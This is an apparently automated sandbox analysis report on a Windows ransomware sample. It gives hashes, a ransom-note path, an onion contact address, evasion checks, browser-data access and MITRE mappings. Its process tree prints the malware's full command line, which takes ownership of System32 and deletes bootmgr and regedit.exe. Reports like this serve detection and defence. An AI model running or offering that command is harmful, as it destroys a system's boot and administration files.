Analysis
- max time kernel: 150s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
- submitted: 06-11-2024 13:55
Behavioral task: behavioral1
- Sample: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Resource: win7-20241010-en
General
- Target: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Size: 3.1MB
- MD5: 6a85d0ba4d1db63d390b7a071d60e0ef
- SHA1: 79a32ee067e19b43bc3f29fde3a3ff95986f8e2e
- SHA256: 369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412
- SHA512: 16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce
- SSDEEP: 49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD
Malware Config
Extracted:
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT
- http://mail2tor2zyjdctd.onion/
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  Processes:
    description   ioc                                           process
    Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__   369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Renames multiple (202) files with added filename extension
  This suggests ransomware activity of encrypting all the files on the system.
- Disables Task Manager via registry modification
- Possible privilege escalation attempt 5 IoCs
  Processes:
    pid    process
    2508   takeown.exe
    1724   takeown.exe
    2312   icacls.exe
    2368   takeown.exe
    2336   icacls.exe
- Checks BIOS information in registry 2 TTPs 2 IoCs
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    description         ioc                                                                process
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    Key value queried   \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion     369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Modifies file permissions 1 TTPs 5 IoCs
  Processes:
    pid    process
    1724   takeown.exe
    2312   icacls.exe
    2368   takeown.exe
    2336   icacls.exe
    2508   takeown.exe
- Reads user/profile data of web browsers 3 TTPs
  Infostealers often target stored browser data, which can include saved credentials etc.
- Themida packer (yara rule match) 2 IoCs
  Processes:
    resource                                                                  yara_rule
    behavioral1/memory/576-27-0x0000000000B00000-0x0000000001330000-memory.dmp   themida
    behavioral1/memory/576-26-0x0000000000B00000-0x0000000001330000-memory.dmp   themida
- Checks whether UAC is enabled 1 TTPs 1 IoCs
  Processes:
    description         ioc                                                                           process
    Key value queried   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  Processes:
    pid    process
    576    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
- Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes:
    description   ioc                                                        process
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   icacls.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   icacls.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   takeown.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   cmd.exe
- Suspicious use of AdjustPrivilegeToken 5 IoCs
  Processes:
    description                       pid    process
    Token: SeDebugPrivilege           576    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    Token: SeDebugPrivilege           576    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    Token: SeTakeOwnershipPrivilege   1724   takeown.exe
    Token: SeTakeOwnershipPrivilege   2368   takeown.exe
    Token: SeTakeOwnershipPrivilege   2508   takeown.exe
- Suspicious use of WriteProcessMemory 24 IoCs
  Processes (each of the six entries below is recorded four times, 24 IoCs in total):
    description                        pid    process                                                                 target process
    PID 576 wrote to memory of 1824    576    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe   cmd.exe
    PID 1824 wrote to memory of 1724   1824   cmd.exe                                                                 takeown.exe
    PID 1824 wrote to memory of 2312   1824   cmd.exe                                                                 icacls.exe
    PID 1824 wrote to memory of 2368   1824   cmd.exe                                                                 takeown.exe
    PID 1824 wrote to memory of 2336   1824   cmd.exe                                                                 icacls.exe
    PID 1824 wrote to memory of 2508   1824   cmd.exe                                                                 takeown.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
  PID: 576
  Signatures:
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
    PID: 1824
    Signatures:
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32
      PID: 1724
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe
      Command line: icacls C:\Windows\System32 /grant Admin:F
      PID: 2312
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32\drivers
      PID: 2368
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe
      Command line: icacls C:\Windows\System32\drivers /grant Admin:F
      PID: 2336
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\takeown.exe
      Command line: takeown /f C:\Windows\System32\LogonUI.exe
      PID: 2508
      Signatures:
        - Possible privilege escalation attempt
        - Modifies file permissions
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
- Defense Evasion
  - File and Directory Permissions Modification (1)
  - Virtualization/Sandbox Evasion (1)
- Credential Access
  - Credentials from Password Stores (1)
    - Credentials from Web Browsers (1)
  - Unsecured Credentials (1)
    - Credentials In Files (1)